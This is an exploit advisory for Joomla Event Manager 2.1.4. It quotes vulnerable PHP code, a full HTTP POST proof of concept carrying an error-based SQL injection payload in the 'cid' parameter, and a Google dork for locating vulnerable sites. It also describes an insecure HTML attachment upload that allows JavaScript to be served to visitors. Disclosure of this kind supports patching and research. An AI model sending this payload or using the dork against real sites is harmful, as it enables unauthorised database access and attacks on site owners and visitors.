# Exploit Title: Joomla Event Manager 2.1.4 - Multiple Vulnerabilities
# Google Dork: inurl:option=com_jem
# Date: 08-12-2015
# Author: Martino Sani
# Vendor Homepage: www.joomlaeventmanager.net
# Software Link: www.joomlaeventmanager.net/download?download=50:jem-2-1-4-stable
# Version: 2.1.4
# CVE: -
# VULNERABILITIES
##1 SQL Injection
Resource: index.php?option=com_jem&view=myevents
Parameter: cid
Authenticated user can execute arbitrary SQL queries via SQL injection in the functionality that allows to publish/unpublish an event.
### Source Code
File: sites/models/myevents.php
function publish($cid = array(), $publish = 1)
{
if (is_array($cid) && count($cid)) {
$cids = implode(',', $cid);
$query = 'UPDATE #__jem_events'
. ' SET published = '. (int) $publish
. ' WHERE id IN ('. $cids .')'
. ' AND (checked_out = 0 OR (checked_out = ' .$userid. '))';
$this->_db->setQuery($query);
}
}
### PoC
POST /joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151
Cookie: 55cfbe406ffe44b0159d9a943820d207=gauuoq0rqlakkltqj4dd1mpd76; jpanesliders_stat-pane=0; jpanesliders_event-sliders-10=2; d6300469df4ad94ccc019d02bc74f647=4339lu3g2tn4lhg2lvgd8ft263
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 352
filter=1&filter_search=&limit=10&cid%5B%5D=1,2)%20AND%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20AND%20(1577=1577&filter_order=a.dates&filter_order_Dir=&enableemailaddress=0&boxchecked=1&task=myevents.unpublish&option=com_jem&5c597c6e06b1d6627024f147b562ecaf=1
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##2 Insecure File Upload
Default JEM settings allows to upload HTML/HTM files as event's attachment.
An authenticated attacker could upload malicious HTML/HTM files with malicious code (e.g. Javascript).
These attachments could be reachable on "<website>/media/com_jem/attachments/event/event[id]/" or downloaded and executed locally by the victim's browser.
Attachments process is handled by "/site/classes/attachments.class.php" file.
File types allowed by default are in the "/admin/sql/install.mysql.utf.sql" file.
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# NOTES
08-01-2015: Vendor notification.
08-12-2015: Vendor fixes the issues in the development branch.
The author is not responsible for the misuse of the information provided in this security advisory.